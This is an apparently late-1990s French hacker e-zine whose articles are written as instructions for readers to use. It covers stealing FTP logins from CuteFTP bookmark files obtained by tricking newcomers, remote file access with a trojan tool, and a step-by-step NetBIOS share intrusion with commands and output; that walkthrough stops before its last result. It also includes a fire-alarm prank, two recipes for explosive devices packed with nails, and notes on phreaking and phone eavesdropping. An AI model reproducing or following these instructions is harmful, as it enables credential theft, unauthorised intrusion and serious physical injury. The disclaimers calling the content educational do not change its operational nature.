

          101010101010101    010101010101       10101010101010   
         0 Issue #2 ---- 1  0 ---------- 1     1 ------------ 0    
         1 ------------° 0  1 ---------° 0     0 -- 010101 -° 1    
          10101 --- 01010   0 -- 10101010      1 - 0      1 - 0        01 
              1 --- 1       1 -- 0             0 - 0      0 - 1        1 0 
     0100101010 --- 010101010 -- 101010101010101 -  010101  - 0101010010  1 
    0         1 --- 1       1 ---------- 0     0 ------------ 0            0
    1         0 --- 0       1 ---------- 0     1 - 10101010 - 1            1
     0101010101 --- 11010101010101101 -- 1010101 - 0      0 - 0101010010  0 
              1 --- 0               0 -- 0     0 - 1      1 - 1        1 1
              0 --- 1        01010101 -- 1     1 - 0      0 - 0        10  
              1 --- 0       0 ---------- 0     0 - 1      1 - 1     
              0 --- 1       1 ---------- 1     1 - 0      0 - 0      
               01010         101011010101       010        010       


*************************************************************************************
*  -=THE SHADOWS ARMY=-                                                             *
*                                                                                   *
*  Tout ce que vous pourrez lire dans ce zine est à un but éducatif seulement!      *
*  Si vous causez des dommages ou que vous vous faites pogner c'est de votre faute! *
*                                                                                   *
*  URL : http://www.tsarmy.org                                                      *
*  E-MAIL : tsarmy@hotmail.com                                                      *
*  IRC : Undernet - #TSARMY                                                         *
*  ICQ : 25227684                                                                   *
*************************************************************************************


-= DISCLAM =-
°°°°°°°°°°°°°

Bienvenue dans le #2 de TSA...On commence a produire des e-zines...on en
sortira un par mois environ alors je vous souhaite bonne lecture a tous!

-= INDEX =-
°°°°°°°°°°°

1. WAREZ LEECH                        © [Jideel]
2. INFILTRATION POUR DL DE FICHIERS   © [Gandalf]
3. BACK ORIFICE ARME INUTILE          © [Gandalf]
4. LE HACK PAR NiTR0GeN               © NiTR0GeN
5. UN PTIT TRUC                       © [Gandalf]
6. BOMBE RUDIMENTAIRE                 © [Gandalf]
7. BOMBE NOIR                         © [Gandalf]
8. INTRO AU PHREAKING                 © DECdeamon
9. ECOUTAGE ELECTRONIQUE              © |{night
10. HOW TO ?                          © WaR^l0rDz
11. END OF ZINE #2                    © The Shadows Army  


******************************************************************************
****************************** 1.Warez Leech *********************************
******************************************************************************


Héhéhé acrocheur comme titre non? ¦) Bon pour mon premier article je vai vous 
dire comment vous servir du tree.dat de votre CuteFTP... Ce petit fichier contient
votre bookmark de votre CuteFTP, c'est a dire tous vos site que vous avez enregistrer
dedans... il se situe dans le répertoire de votre CuteFTP 
(generalement c:\Program Files\CuteFTP\tree.dat)

Ou trouver des tree.dat?

Sur mIRC bin sur! ¦) dite sur un chan qu'il vous manque un fichier pour votre CuteFTP 
si vous etes chanceux il va y avoir un newbies qui va venir vous voir tous fiere de 
vous aider n'esiter pas a "beurrer epais" pour obtenir vitre fichier.

une foi obtenue prener votre fichier a vous et faite en une copie dans un autre 
répertoire de votre disque dur (a moin que de perdre votre bookmark a vous ne vous dérange 
pas! ;) ), ensuite prener le fichier que le newbie vous a si gentiment donner ¦) 
(ou que vous avez picker) et metter le dans le répertoire de votre CutFTP. Ouvrer votre 
CuteFTP et... Voila vous avez tous le bookmark de votre newbie, si vous ete chanceux et 
que le newbies (ye po trop newbies finalement!) utilise des ftp warez ou le ftp de son 
entreprise ou autre, bin vous avez tous ces sites maintenant et vous pouvez vous en servir
a volonter!

Autre facon: si vous saver votre victime infecter d'un cheval de Troyen bin piquer lui
sont tree.dat (hey les lamez oublier pas vos *.pwl la! ¦) )

"Ouin mais moi jveut juste le pass pis le login moi."

Pas de troube ya des ti programme qui existe pour ca come firecute et revelation 
personnellement je ne me suis jamais servie de revelation jai toujours utiliser
firecute vous le trouverez a cette adresse: 

http://hack.zone.to/zip/narzedzia/hasla/firecute.zip

Pour firecute copier le dans le répertoire de votre cuteftp (generalement 
c:\Program Files\CuteFTP\) ouvrer vitre ms-dos aller dans le répertoire de votre 
cuteftp et ouvrer firecute; ya des commande pratique pour firecute:

taper firecute pour voir le tree.dat par default
taper firecute tree2.dat pour voir le trre2.dat etc...
taper firecute >pass.txt pour copier le tree.dat dans un .txt (pour le > appuyer sur 
tenner le alt+62 dans le pad numérique)


Un autre facon plus longue (bin longue jdoit dire) c'est de vous cree une adresse 
fictive et dit mettre comme login genre " TEST " pis comme pass
" abcdefghijklmnopqrstuvwxyz1234567890 " et ensuite d'ouvrir vottre tree.dat
(avec notepad, edit ou wordpad comme vous vouler)et de noter chaque caractère qui se
raporte a la lettre de lalphabet et au chiffre

Voila c'est pas plus dure que ca d'avoir des ftp gratos! ¦) (hey ta meme pas besoin de 
trader avec ca! ¦) ) profiter en

                                           [Jidéel]


******************************************************************************
***************** 2. Infiltration pour dl de fichier *************************
******************************************************************************

************************************************************************
*                                                                      *
* l infiltration!                                                      *
* enfin! voilas tout se que les newbies de la terre reve de faire!     *
*                                                                      *
* et bien il a plusieur facons!(évidament)                             *
* je vais en siter qu une seul!                                        *
*                                                                      *
* Avec une commende ms-dos il est tout de meme facile                  *
* de s infiltrer... mais sa reste (du mouin pour un newbies)           *
* compliquer (un peut).                                                *
*                                                                      *
* alors je vous propose plutot la médode "facile"                      *
* il vous faut d abort "deepbo"(.exe)                                  *
* choisiser une victime (mais pas au hasard sinon c est du lam sa)     *
* en suite le prog vous dis "enter host adresse"(de votre pc)          *
* (pout trouver le host fait /dns "nick")                              *
* vous verifier si le host est bon et  peser sur "ok"                  *
* ensuite vous metter le host de votre victime dans le rectangle       *
* "sweep ip" vous peser sur "add"                                      *
* ensuite dans le rectangle plus bas le ip de votre victime apparaitra *
* vous "cliquer" dessus et vous peser sur "sweep"                      *
* le prog va Sweeper tout les ip du corespondant,                      *
* des choix vont vous etre donner dans l autre rectangle!              *
* "double clic" dessus et c est fait! vous pouver maintenant           *
* renommer,suprimer,copier,DoNwLoAdEr des fichier a votre guise!       *
*                                                                      *
* Évidament je ne suis pas responsable!                                *
* en aucun cas de tout se que vous pourrer faire de ce zines           *
* qui celui-ci a ete fait par pur but d education!                     *
*                                                                      *
*                                 by  [Gandalf] "Mitrandir"            *
*                                                                      *
* mamax666@hotmail.com                                                 *
* TSARMY@hotmail.com                                                   *
************************************************************************ 



******************************************************************************
********************* 3. Back Orifice arme inutile ***************************
******************************************************************************


*************************************************************************
*                                                                       *
*  Back orifice! WoW! le plus beau programe de lamers                   *
*  au monde!                                                            *
*                                                                       *
*  je denonce le journal "le soleil" d avoir dit que                    *
*  Back Orifice etait a se jour l un des meilleur programe              *
*  de Hacking. Je n ecrit pas dans le but de "caler"                    *
*  le journal,mais bien de le contre dire.                              *
*                                                                       *
*  se qui est 1er tout a fais faux puisque,                             *
*  Back orifice comme vous le savez a besoin d une taupe                *
*  (un trojans)pour s infiltrer dans le pc de la victime                *
*  se qui veut donc dire que la victime a ete choisi au hasard          *
*  se qui fais de se programe un arme tout a fait "lamers"              *
*                                                                       *
*  et 2ement Back orifice est un programe tout a fait "lamers"          *
*  qui, pratiquement nous est tout a fait inutile puisque               *
*  nous avons pas de temps a perdre avec des programe                   *
*  de meme.                                                             *
*                                                                       *
*  le hacking ne consiste absolument pas a "l attaque"                  *
*  d un autre pc.un hacker ne constitue absolument pas                  *
*  une menace pour le client de mIRC ou de icq(ect...)                  *
*  alors svp quand vous pogner des virus,                               *
*  metter pas sa sur la faute des Hacker puisque                        *
*  se sont les "lamers" qui prenne plaisirs a se genre de programe      *
*  mais fait attention,nous somme capable nous aussi                    *
*  mais pourquoi se servire d arme qui nenous serve qua pur but         *
*  de deffense,pourquoi s amuser a briser l ordie des autre?            *
*                                                                       *
*  entk ne blamer pas les Hacker pour vos petit tracas quotidien        *
*  merci :)                                                             *
*                                                                       *
*                                    by [Gandalf]  "Mitrandir"          *
*                                                                       *
*  mamax666@hotmail.com                                                 *
*                                                                       *
*  ps;au journal "le soleil" je ne veut et je n est jamais voulus nuire *
*  a votre reputation,je comprend que c est une simple erreur que vous  *
*  avez fait :) vous ete exuser de votre manque de savoir.              *
*************************************************************************



******************************************************************************
************************ 4. LE HACK PAR NiTR0GeN  ****************************
******************************************************************************


**********************************************************************
\    __   ___  ___  ______  _______    _____  _____   ____  __   ___  \                                     
 \  ¦  \ ¦   ¦¦   ¦¦__  __¦¦       ¦  ¦  _  ¦¦ __  ¦ ¦ ___¦¦  \ ¦   ¦  \                              
  \ ¦   \¦   ¦¦   ¦   ¦ ¦  ¦   O   ¦  ¦ ¦ ¦ ¦¦ ¦ ¦-¦ ¦ ¦_  ¦   \¦   ¦   \                     
  / ¦        ¦¦   ¦   ¦ ¦  ¦  ¦-\  \  ¦ ¦ ¦ ¦¦ ¦ ___ ¦  _¦ ¦        ¦   /                     
 /  ¦  ¦\    ¦¦   ¦   ¦ ¦  ¦  ¦  \  \ ¦ ¦_¦ ¦¦ ¦__¦ ¦¦ ¦__ ¦  ¦\    ¦  /                         
/   ¦__¦ \___¦¦___¦   ¦_¦  ¦__¦   \__\¦_____¦¦______¦¦____¦¦__¦ \___¦ /                                             
********************************************************************** 


****************
*   BullShit   *
****************
Ce texte est dedié a la communauté du hacking , cracking , phreaking et 
tout et tout...Je donne ce texte ,Tout droit reserver a NiTR0GeN.Je donne
le droit a tout le monde de distribuer ce texte dans le BBS,site Web , Ftp,
Gopher,Network ...En autant que mon texte n`est pas modifier.Ce texte est
ecrit pour votre éducation seulement , n`utiliser pas les ressources de ce 
texte pour mal faire,si vous le faite ne venez pas me blâmer.
Pour me contacter :
                   ¤E-mail: e-zine@nitr0gen.org
                   ¤IRC: Undernet , #tsa
                   ¤ICQ: mon UIN est :27155472

Bon assez de conneries passons aux choses sérieuses .

****************
*    Index     *
**************** 

   ¤1 : 
        -Petite introduction
        -Code d`étique d`un hacker 
   ¤2 :
        -Les bases a savoir 
   ¤3 :
        -Quelque truc sur windows        
        -Securité maximum avec windows

****************************************************************************

                         -------------------
                         ¦  INTRODUCTION   ¦ 
                         -------------------

Bienvenu(e)s dans mon premiere article que j'écrit,je voudrais vous dire 
que le hacking cest la chose la plus kool au monde , mais pour devenir 
hacker ca prend de la patience de l'ambition , de l'intelligence et une 
esti de bonne chaise,parce que vous aller rester devant votre PC pendant
des heures a lire a ce pratiquer...Je voudais que vous sachier que je ne 
suis pas un hacker élite,donc je ne sais pas tout et en plus j'ai le plus
grand handicap qu`un hacker peut avoir ~JE RUN WINSHIT!!!!!!~



                     ------------------------------
                     ¦  Code d`étique d`un hacker ¦ 
                     ------------------------------

¤1:Ne jamais entrer dans un ordinateur dans le but de le detruire ou de 
   deleter qqchose , a part pour garder votre securité ou pour assurer
   de pouvoir regagner access a cet ordinateur en question...

¤2:Ne jamais hacker des ordinateur du gouvernement!PKOI?Parce qu'ils 
   disposent d'argent et de temp pour vous retracer ou retrouver,tandis que 
   les compagnies eux doivent faire de l'argent et ne dispose pas des 
   ressources pour vous retrouvé.

¤3:Hacker est dans le but de disposé plus de conaissances,si ce n'est pas
   votre but desoler mais arreter tout de suite de lire ce texte.

¤4:Hacker c'est loin d'etre comme dans les films commme HACKER ou autres..
   alors enlever vous ca de la tete tout de suite svp

             ====================================================
                               -----------
                               ¦  Bases  ¦ 
                               -----------

	Et oui on a rien pour rien.Avoir un nuke ne fera pas de vous un
hacker,un trojans(SocketDeTrois,BackOrifice,Netbus...)ne fera pas de vous
un hacker.En fait ,ne saisissez vous pas le message que j'essai de vous
passez?Les programmes ne font et ne feront jamais de vous un hacker BORDEL
allez vous comprendre...moi je les compris.
Alors les bases serais :
                        -Pogne toi un esti de bon fauteuil
                         Parce que tu devra lire BEAUCOUP!
                        -Apprend a programmer (C,C++,VB,Asm,Pascal,Perl,etc.)
                        -Pogne toi un livre de Unix et le o/s aussi
                        -Lis sur les network jusqu'a ce que ca te sorte 
                         par le oreille tellement t ECOEURER!
                        -Lis tout le TXT comme ce e-zine qui te passe sous 
                         le nez

             ====================================================

                             ----------------------
                             ¦  Trucs de Windows  ¦ 
                             ----------------------
	Bon voici quelques petits trucs en windows.Pkoi je donne des affaires
en windows ? Mais merde,cest parce que c pas tout le monde qui on Unix,Linux
et de plus je lai meme pas moi meme chu encore dans le stade d'apprendre.
C'est beaucoup sur le plant esthetique les petits trucs...

-->Changer le windows boot up screen pour le votre?
 
   *Aller dans votre root checker pour le fichier Logo.sys.Si il est la
    ouvrez le avec paint et je vous laisse decouvrir le reste.Si il n'est 
    pas la,ne paniquer pas,editer un fichier sous paint avec les conditions
    suivant.
            -Width:320	Height:400
            -Sauver sous le nom Logo.sys dans le root et en 256 couleurs 
    Voila apres ca quand vous redemarez votre pc le dessin que vous avez
creer apparetra.
    >P.S
        Essayer d'ouvrir avec paint les fichiers suivants:
            -Logow.sys
            -Logos.sys
Je vous laisse decuvrir le reste....

-->Vous voulez enlever les petites fleches quand vous faite un racourci?

   *Aller dans run et tapper "Regedit" ,quand vous etes dans ce programme
    faites bien atetion a ce que vous faire car cest ca pourais vous pouriez
    fucker votre ordi.Aller dans Edit/Find et chercher pour "IsShortcut"
    quand il en trouve un deleter le.Faite cette recherche jusqu'a ce qu'il
    ne trouve pu de "IsShortcut".Redemarer windows et le tour est jouer.

-->Vous voulez rebooter plus vite?

    *Ouvrer notepad inserer cette petite ligne : @exit     
     sauvegarder cela sous le nom de "Restart.bat".Aller dans ses proprietes
     et puis dans l'onglet Program.Cocher "Close on exit" et aller sur le 
     bouton "Advanced" Cocher "Ms-Dos mode" et enlever le crochet a "Warn
     me before entering ms-dos mode" appuyer sur ok et une autre fois.Clicker
     sur votre fichier et vous reboter rapidement...

-->Comment eviter vos cochoneries d'aller a la corbeille?
 
   *Aller dans les proprietes de la corbeille et cocher "Do not move file to
    the recycle bin.Remove file immediatly on delete."

-->Comment booster le speed d'un modem(Imaginer pas booster BEAUCOUP la...)?

   *Ouvrer le fichier system.ini,aller dans la section [386Enh] et marquer
    COMxBUFFER=1024 (Ou le x est le numeros de votre comm port[modem])

-->Comment hacker le trial version de winzip ( Version en bas de 7.0 )?

  *Chercher le fichier Winzip32.ini.Ouvrer le avec notepad descender jusqu'en
   bas et vous voyez combien de fois vous lavez utiliser et la date de
   l'installtion,qu'aller vous faire?

-->Comment faire aparraitre le menu "Start" plus vite?

  *Simple,ouvrer le registry avec regedit comme dans une des questions
   precedente.Aller dans HKEY_CURRENT_USER\Control Panel\ choisissez desktop
   clicker sur le bouton de droite et faites un nouveau string nommer 
   "MenuShowDelay" donner lui une valeur entre 1 et 10.Redemarer votre
   windows et le menu va vraiment plus vite!

---------->Bon je crois que vous aller vous ecoeurer des ti trucs de winshit
---------->alors je passe a la securiter winshit
---------->Pour en savoir plus sur les truc windows contacter moi...

                           --------------------------
                           ¦  Securiter de Windows  ¦ 
                           --------------------------

	Bon cest bien bo d'attaquer le monde ma gangne de LamerZ avec un
grand Z ,mais faut ce proteger bin plus qu'attaquer.Bon faut dire que windows
pour la protection CEST DE LA MARDE!Mais mononcle NiTR0GeN va vous montrer
ce qu'il faut faire pour etre partiellement blinder chez soi,et un peu pour
internet.

	***************
	* A la maison *
	***************

	-Premierement faite vous une police.Bon bon "qu'est ce qu'un police?"
un police c'est des restriction du genre Tu peut pas aller dans Dos , tu peut
pas ouvrir tel programme ,tu peut pas ecrire sur le HD...Komment faire?
Simple aller Telecharger PolicyEditer sur Http://www.nitr0gen.org aller dans
la section Hacking et puis Get protected,aller dans le bas de la page le 
downloader(poledit.zip).Apres ouvrez le programme puis Fichier Open registry
puis cliquer sur Local user pour faire des restriction sur le user vous ete
deja dessus ou Local computer (de koi du genre) pour le defaut user.Puis
il y a une fenetre qui va vous apparaitre cocher le restriction et une partie
de la securiter est faire.REDEMARER POUR LES CHANGEMENT.
Quand vous ete tanner des restriction Deleter le fichier *.pol(pour user) et
*.adm(Pour le default user).

	-Deuxiemement fouter un Bios password.Quand votre pc boot pesez F2 ou
Del ca va vous amener au menu bios.Selon la version et la distribution que 
vous disposez il y aura un option pour foutre un password.Ne l'oublier
sourtout pas...
Si vous l'oublier (AH NON JE NE PEUT PLUS BOOTER MON ORDI!!!!)bin non!!!
tout ce que tu as a faire cest d'ouvrir ton ti ordi d'enlever la baterie
ca va reseter ton CMOS et perdre les donner du bios.YOUHOU! tu peut booter
a nouveau.Si la baterie est souder,pas grave reset le jumper ca va faire la 
meme affaire.Si ya pas de jumper et a s' enleve pas?BIN C PAS LA BATERIE 
SIBOIRE!!!

	-Troisiement enlever votre disquette du boot.Meme chose aller dans le
bios en demarant et la il y aurant la sequence de boot genre C: A: metter
juste C: pas A: saver et cest korrect.
Remplace la lettre C pour votre HD et le A pour votre floppy drive.

	-Quatriemement enlever les boot up key...C'est koi ca?Bin c quand tu 
pese F8 pour avoir le choix de booter en mode Normal,Sans echec,Dos...
Ouvrer le fichier MsDos.sys.Aller dans la section [Options] et marquer 
BootKey=0 et voila vos avez un system bien proteger (a la maison).

	-Cinquiement foutez une protection pour que votre boite de PC sois
sous clef!

-->Mais pkoi je vous est fait faire ca?
	
	C'est simple.Si le gars essai d'ouvrir ton ordi il y a un password 
bios,il essai d'enlever ta baterie mais il peut pas entrer parce que ton PC 
est sous clef.A mettons qu'il reussi a passer le password Bios il ne peut pas
interompre le boot up a cause que l'ordi ne check pas la disquette et les
boot keys.Ensuite il se log comme le default user sur windows mais! mouahah
a cause de la policy qu'on a fait il ne peut pas executer ni deleter ni rien
faire.Donc desoler il ne peut pas effacer *.pwl pour ce logger a nouveau
comme le bon user..Mouhaha fourrer le gars!
      
	**************
	*  Internet  *
	**************

	Bin pour ce qui est d'internet bin je ne peut pas vous expliquer 
parce que ya trop trop de chose et que je ne sais pas tout.C'est tres 
complexe la protection sur reseau.
Alors le seule conseil je peut vous donner cest d'aller downloader(dans la
meme section que Poledit.zip) tout les patches d'upgrader avec winsock2.x,
d'avoir un firewall.C'est ca.

 
                                        NiTR0GeN


******************************************************************************
***************************** 5. Un Ptit Truc ********************************
******************************************************************************


************************************************************
*                                                          *
*                                                          * 
*   vous savez que partir l alarme de feu de votre         *
*   ecole merite 500$ d amende ou 6mois de prison          *
*   si vous voulez la partir sans vous faire pogner        *
*   lisez se qui suit....                                  *
*                                                          *
*   1er faire un papier sur lequels vous ecrivez           * 
*   le mieux possible;BRISER ou EN DÉRANGEMENT,            *
*   ecriver vers le bas du papier "la direction"           *
*   ensuite il vous sufit de le coller en-haut             *
*   d une clanche d alarme!                                *
*                                                          *
*   il est clair que vous aller tomber sur un lamers       *
*   qui va se dire ceci;"wow c est briser,jva tirer        *
*   pour voir.." héhé sucsess garantis!                    *
*   apres tout,qui n as jamais rever de tirer l alarme:)   *
*   alors le lamers va vouloir le faire juste pour le kick!*
*                                                          *
*   en aucun cas je veut etre tenu responsable de se       *
*   que vous auriez pu fair de se qui est ecrit dans se    *
*   zines il a ete fait a seul but educatif:) merci.       *
*                                                          *
*                                                          *
*                          by [Gandalf]  "Mitrandir"       *
*                                                          *
*   mamax666@hotmail.com                                   *
************************************************************



******************************************************************************
*********************** 6. Bombe Rudimentaire ********************************
******************************************************************************


******************************************************************
*                                                                *
*   Voici quelque example de bombe "poche" ou "artisanal"        *
*   je vais en donner une seul example (parmis tant d autre)     *
*   bien sur se ne sont pas des bombe de "terroriste"            *
*   mais bien de petite bombe poche,mais asser puissante pour    *
*   detruire une voiture ou meme une maison!!                    *
*                                                                *
*   "coctail molotov"  hé oui! sans doute le plus connus!        *
*   mais je vais vous donner MA version du "coctail molotov"     *
*   tout d abort metre du gaz dans une bouteil de vin,           *
*   pacer un chiffon dans le goulo.ensuite prendre un rouleau    *
*   de PQ vide,fermer un extrémiter et le remplir de poudre noir *
*   ainsi que quelque clou ou vis (20-25) fermer l autre         *
*   extremité,placer une meche, et compacter le tout fermement   *
*   avec tu ruban adesif.ensuite et pour finir acheter une       *
*   petite bouteil de propane, prendre tout ces jolie objet      *
*   et faite les tenir ensemble avec du ruban adesif             *
*   allumer la meche de la bouteil tout en fesant attention      *
*   de ne pas allumer celle du papier Q et... lancer!            *
*                                                                *
*   1er la bouteil casse,le feu prend donc la meche du PQ aussi  *
*   alors les vis et les clous vole dans la piece!!              * 
*   (bien sur sa plante pas dans les mur comme dans les film     *
*   mais sa reste un objet de metal pointu qui vole a grande     *
*   vitesse :) et enfin le propane saute! BOM!                   *
*   héhé vous ete peut etre pas un grand terroriste mais         *
*   votre oeuvre va faire la 1ere page du journal le lendemain!  *
*   (croyer moi héhé)                                            *
*                                                                *
*   ce document a ete fait a seul but educatif et informatif     *
*   je ne suis donc aucunement responsable de se que vous pouriez*
*   fair du savoir que vous venez d acquerire! :):)              *
*                                                                *
*    Merci :)                                                    * 
*                                  by  [Gandalf]  "Mitrandir"    *
*                                                                *
*  mamax666@hotmail.com                                          *
******************************************************************



******************************************************************************
****************************** 7. Bombe noir *********************************
******************************************************************************


********************************************************
*                                                      *
*   héhé oui,encore une criss de bombe artisanal!      *
*   mais je vais vous montrer ma medode!               *
*   ouin elle n est pas digne d un grand terroriste    *
*   mais elle est tout de meme efficace pour les       *
*   reglement de compte!                               *
*                                                      *
*   malheureusement je ne suis pas un specialiste      *
*   des bombe a retardement alors mes bombe doive etre *
*   allumer sur place.mais se n est pas vraiment       *
*   un gros probleme puisqu une merche asser longue    *
*   peut vous donner le temps de fuir :)               *
*                                                      *
*   vous prenner d abort une bouteil de vin dans       *
*   laquel vous metter de la poudre noir.              *
*   ensuite prendre un carton de la meme longeur que   *
*   la bouteil (mais pas jusqu au goulot juste la      *
*   grosse partie) planter des clou dans le carton     *
*   planter les en rang tout en laissant une bande     *
*   libre dans le milieu.ensuite placer le carton      *
*   autour de la bouteil avec du ruban adesif          *
*   (dans la partit laisser) et pour finir mettre      *
*   de la plastisine dans le goulot tout en laissant   *
*   un trou pour la meche!                             *
*                                                      *
*   en plus de l explosion tout vos clou vons etre     *
*   propulsser dans la piece!                          *
*                                                      *
*                        by   [Gandalf] "Mitrandir"    *
*                                                      *
* PS;pas responsable de vos betise                     *
*      mamax666@hotmail.com                            *
******************************************************** 



******************************************************************************
************************ 8. Intro au Phreaking *******************************
******************************************************************************


(ca fait rois fois que je recommence à cause de notepad fak calll 
que je suis pompé!)

Bon pour les newbies ou les lamers qui le savent pas phreaking 
c'est obtenir une communication téléphonique gratos. Très utiles
pour les vieilles compagnies cheap. moi-meme j'ai eu affaire
à télébec en voyage pis j'ai regretté de pas avoir trainé mes 
outils avec moi, la prochaine fois j'le frai 2k... AVIS AU NEWBIES:
la meilleure facon de commencer c de phreaker Télébec... vous 
allez réussir, presquesur!

Télébec facilement trouvable chez les vieille matantes aux mains 
vertes et dans les coins reculé comme lhaut du québec genre 
chibougamau ou kuujuak ou st-clinclin-des-meumeus :P

Ya quelques règles fondamentales à suivre: le phreaking c'est 
illégale donc si vous vous faites pogné c la prison ou ben ca
vous coute TRES cher donc soyez prudent avec le black box restez
pas trop longtemps pke si ca ring depuis 4 heure dans le tél du 
gars qui appele ste machine la (ca simule les ring, pour pas avoir
à répondre) il va se douter kia une krosse lorsque vous écoutez 
des conversations, faites pas de bruit, et si possible n'empruntez 
pas la ligne de kkun parce que il ya des chances que ca va la bloquer 
pour le proprio et il va découvrir qqch. on cache les box.... sinon 
ca attire les ennuis!

Des outils ca en prend: un tournevis: pour les montages on en a 
presque toujours besoin...un soudeur: aussi utiles mais pas 
essentiel... 2k ca va mieux que scotcher ou attacher avec des cordes :P
des pinces coupantes: on en a besoin pour couper les fils et aussi les 
dégainer, meme si un dégaineur c mieux pour ca...  ... faudra toujours 
couper et dégainer des fils pour raccorder les montages et meme pour les 
fabriquer un fil de tél coupé à un boute pis dégainer: pour raccorder la 
boite à la ligne de tél. c sur que les box rentreront pas tuseule dans les
trous des prises!

Bon les montages on devrait appeler ca des box, meme si ca a pas du tout la
forme d'une boite...aussi, elles sont nommées avec les couleurs de l'arc-en ciel...
meme si elles sont pas mal toutes grises avec des circuits....

Vous connaissez assez pour vous en sortir, pis des mes prochains articles je 
vais parler des différentes boxz et comment les monter...


                                                ÐECdeamon



******************************************************************************
************************ 9. Ecoutage électronique ****************************
******************************************************************************

.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,.


   Hey oui ! On est 1999 ! J'espere que vous vous êtes saouler au bout pis
que vous avez appeler nez rouge pour des lifts gratuits...

Mais je ne suis pas là pour vous compter mon Noel ! Mais non ! Je vais plutot
vous expliquer un petit truc intéressant.
  
   The Super-Truc Numaro 1:
                 -Vous avez une soeur ou des freres fatiguants qui parlent au
                  téléphone et vous voulez écouter sans vous faire remarquer?
                                       Tres Simple
                  Pas besoin de vous cacher dans un coin et d'essayer de ne 
                  pas faire de bruits.Vous n'avez qu'a vous brancher sur la 
                  ligne de facon a ce que vous puissiez entendre mais que les
                  autres n'entendent rien même si vous crieriez.Venons-ens au
                  fait.... Tu pogne le récepteur(Le cossin dans lequel tu 
                  parle...tk... me semble que ca s'appelle de meme)pis tu le 
                  branche dans le mur direct.Faque avec cette super device là
                  mon homme tu va pouvoir jouer les james bond sans jamais te 
                  faire pogner.J'ai découvert ca lors de mes nombreuses 
                  séances "d'écoutage électronique" de ma soeur et ses amies.
                  Cé un peu BS comme moyen d'écoute mais y a un début a tout!
               
              N.B.    C'te truc là y marche pas partout...TK...j'espere ca 
                      marche chez vous !        :]
        

        Je tien a remercier Soeur Angèle pour la recette a biscuits qui m'a
        bourrer pour la soirée!
                              
.»¬=æ¤º²°`¯ ¯`°²º¤æ=¬».,_¸,.»¬=æ¤º²°`¯ ¯`°²º¤æ=¬».,_¸,.»¬=æ¤º²°`¯ ¯`°²º¤æ=¬».
                        Made in Taiwan by |{night                 
.»¬=æ¤º²°`¯ ¯`°²º¤æ=¬».,_¸,.»¬=æ¤º²°`¯ ¯`°²º¤æ=¬».,_¸,.»¬=æ¤º²°`¯ ¯`°²º¤æ=¬».



******************************************************************************
****************************** 10. HOW TO ? **********************************
******************************************************************************
 

  
  ##       ##     ########     ##         ##        ##########     ########           #######
  ##       ##    ##########     ##       ##         ##########    ##########         ##     ##
  ##       ##   ##        ##    ##       ##             ##       ##        ##                ##  
  ###     ###   ## #      ##    ##       ##             ##       ## #      ##                ##
  ###########   ##  #     ##    ##  ###  ##             ##       ##  #     ##                ##
  ###########   ##   #    ##     ##  #  ##              ##       ##   #    ##               ##
  ###     ###   ##    #   ##     ##  #  ##              ##       ##    #   ##            ###
  ##       ##   ##     #  ##     ##  #  ##              ##       ##     #  ##          ##
  ##       ##    ##########       ## # ##               ##        ##########         
  ##       ##     ########         #####                ##         ########            ##

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

               Comment hacker une ordinateur ayant un réseau sous Windoze 95-98-NT ?
                                         
                                         - WaR^l0rDz - 

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Allo à toi m'sieur le |-|4c|{3r ! Si tu ne le sais pas déjà, tu vas apprendre à hacker un ordinateur
par le [NBTSTAT]. Tu vas voir c'est facile comme bonjour. 

                 
                                      -=(Règles)=-
                                         ¯¯¯¯¯¯
1. La personne doit avoir sélectionner dans ses options réseau "Client pour les réseaux Microsoft"
2. Pour avoir accès à ses fichiers il faut que la personnes aie coché "Permettre à d'autres utilisateurs 
d'accéder à mes fichiers"
3. Pour imprimer dans son imprimante il faut qu'elle aie coché "Permettre à d'autres utilisateurs
d'utiliser mes imprimantes"
 
                                     
                                    -=(Fonctionnement)=-
                                       ¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Si toutes les règles sont correctes, vous pouvez commencer.

1. Créez un fichier nommé "lmhosts" ; Pas de .*** ; tout simplement lmhosts . Ce fichier doit se trouver
dans le répertoire c:\windows

2. Ouvrez une fenêtre MS-DOS et tapez nbtstat -A IP.Du.Mec (Attention !!! c'est un "A" MAJUSCULE)

3. Si ca marque "Host not found" c'est que le gars n'as pas de ressources partagées... Arretez ici. 
Sinon prenez en note le nom de son ordi et rendez-vous à 4.

4. Cliquez droite sur lmhosts et choisissez notepad pour ouvrir le fichier. Écrivez exactement:
IP.DU.MEC              "Le nom de son ordinateur        "                         #PRE

5. Tapez nbtstat -R

6. Tapez net view \\Nom_de_son_ordi ; Si il y a des ressources partagées, rendez-vous à 7. Sinon, impossible
de pénétrer sans son ordi.

7. Tapez net use * \\Nom_de_son_ordi\Nom_d'une_ressource ; Si ca marche, une lettre va être attribué à sa 
ressource et rendez-vous à 8. Sinon arrêtez.

8. Rendu ici, vous pouvez rentrer dans l'ordi du gars (ou d'la fille ;). Pour ce faire, allez dans Poste de
travail et tapez //Nom_de_l'ordi ou cliquez sur la lettre qui a été attribué à sa ressource.


                                        -=(Exemple)=-
                                           ¯¯¯¯¯¯¯
1. Je tappe nbtstat -A 123.123.123.123 dans une fenêtre MS-DOS. Le résultat:

NetBIOS Remote Machine Name Table
Name Type Status
----------------------
----------------------
SHADOW <00> UNIQUE Registered      <--- SHADOW est le nom de l'ordi du gars
MON-RESEAU <00> GROUP  Registered  <--- MON-RESEAU est le nom de son réseau (sert à rien)
MAC Address = 44-45-53-54-00-00

Donc ici, le nom de l'ordinateur du gars est shadow.

2. Je vais dans notepad, j'ouvre lmhosts et j'écris:

123.123.123.123            "SHADOW            "                         #PRE

3. Encore dans le dos, je tappe nbtstat -R ; Le résultat:

Successful purge and preload of the NBT Remote Cache Name Table.

4. De retour sous dos, je tappe net view \\SHADOW ; Le résultat:

Ressources partagées à \\SHADOW

Nom de partageType         Commentaire
-------------------------------------------------------------------
a                   Disque    
c                   Disque
d                   Disque

Exécution achevée.

5. Je veut donc avoir accès à son C: et je tappe net use * \\SHADOW\C ; Le résultat:

